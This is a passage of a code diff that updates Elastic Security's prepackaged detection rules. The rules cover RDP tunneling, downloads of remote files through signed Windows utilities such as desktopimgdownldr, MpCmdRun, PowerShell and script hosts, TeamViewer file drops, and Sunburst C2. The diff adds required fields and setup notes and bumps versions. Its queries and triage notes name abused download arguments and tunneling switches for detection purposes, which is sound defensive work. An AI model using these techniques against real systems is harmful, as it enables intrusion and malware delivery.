prevalent in the environment by looking for similar occurrences across hosts.\n- Examine network data to determine if the host communicated with external servers using the tunnel.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Investigate the command line for the execution of programs that are unrelated to tunneling, like Remote Desktop clients.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Take the necessary actions to disable the tunneling, which can be a process kill, service deletion, registry key\nmodification, etc. Inspect the host to learn which method was used and to determine a response for the case.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n /* RDP port and usual SSH tunneling related switches in command line */\n process.args : \"*:3389\" and\n process.args : (\"-L\", \"-P\", \"-R\", \"-pw\", \"-ssh\")\n", "references": [ "https://blog.netspi.com/how-to-access-rdp-over-a-reverse-ssh-tunnel/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_desktopimgdownldr.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_desktopimgdownldr.json index ab3e55a5822ce..8c29c36bf33ba 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_desktopimgdownldr.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_desktopimgdownldr.json @@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Desktopimgdownldr Utility", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the\n`lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file\nfrom an internal system.\n- Retrieve the file and determine if it is malicious:\n - Identify the file type.\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions\nif necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the\n`lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file\nfrom an internal system.\n- Retrieve the file and determine if it is malicious:\n - Identify the file type.\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions\nif necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", "references": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_mpcmdrun.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_mpcmdrun.json index 59e4e59a88c32..8dcbab88b386b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_mpcmdrun.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_mpcmdrun.json @@ -12,14 +12,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via MpCmdRun", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows\nDefender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files,\nincluding malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via MpCmdRun\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `MpCmdRun.exe` is a command-line tool part of Windows Defender and is used to manage various Microsoft Windows\nDefender Antivirus settings and perform certain tasks. It can also be abused by attackers to download remote files,\nincluding malware and offensive tooling. This rule looks for the patterns used to perform downloads using the utility.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", "references": [ "https://twitter.com/mohammadaskar2/status/1301263551638761477", "https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -47,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_powershell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_powershell.json index 2fbd3dffc5c14..1d8d50da459f1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_powershell.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_powershell.json @@ -14,6 +14,53 @@ "name": "Remote File Download via PowerShell", "note": "## Triage and analysis\n\n### Investigating Remote File Download via PowerShell\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse signed utilities to drop these files.\n\nPowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it\navailable for use in various environments and creates an attractive way for attackers to execute code and perform\nactions. This rule correlates network and file events to detect downloads of executable and script files performed using\nPowerShell.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert\nif the Administrator is aware of the activity and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=30s\n [network where process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and network.protocol == \"dns\" and\n not dns.question.name : (\"localhost\", \"*.microsoft.com\", \"*.azureedge.net\", \"*.powershellgallery.com\", \"*.windowsupdate.com\", \"metadata.google.internal\") and \n not user.domain : \"NT AUTHORITY\"]\n [file where process.name : \"powershell.exe\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\", \"ps1\", \"bat\") and \n not file.name : \"__PSScriptPolicy*.ps1\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "33f306e8-417c-411b-965c-c2812d6d3f4d", "severity": "medium", @@ -64,5 +111,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_scripts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_scripts.json index d35d969ec4472..9b5fba990f44a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_scripts.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_remote_file_copy_scripts.json @@ -14,6 +14,53 @@ "name": "Remote File Download via Script Interpreter", "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs,\nsuch as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but\ncan also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the script file and the executable involved and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Manually analyze the script to determine if malicious capabilities are present.\n- Investigate whether the potential malware ran successfully, is active on the host, or was stopped by defenses.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives\n(B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id\n [network where process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "1d276579-3380-4095-ad38-e596a01bc64f", "severity": "medium", @@ -42,5 +89,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_sunburst_c2_activity_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_sunburst_c2_activity_detected.json index 11eaab819b4ec..271e592d28ae0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_sunburst_c2_activity_detected.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_sunburst_c2_activity_detected.json @@ -15,6 +15,28 @@ "references": [ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "http.request.body.content", + "type": "wildcard" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "22599847-5d13-48cb-8872-5796fee8692b", "severity": "high", @@ -73,5 +95,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_teamviewer_remote_file_copy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_teamviewer_remote_file_copy.json index e14d72cc0f03a..2ceb786ba066a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_teamviewer_remote_file_copy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_teamviewer_remote_file_copy.json @@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy via TeamViewer", - "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various\nsupport activities. It is also frequently used by attackers and scammers to deploy malware interactively and other\nmalicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this\naccess.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct\nremote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command\nand control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various\nsupport activities. It is also frequently used by attackers and scammers to deploy malware interactively and other\nmalicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this\naccess.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct\nremote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "file where event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", 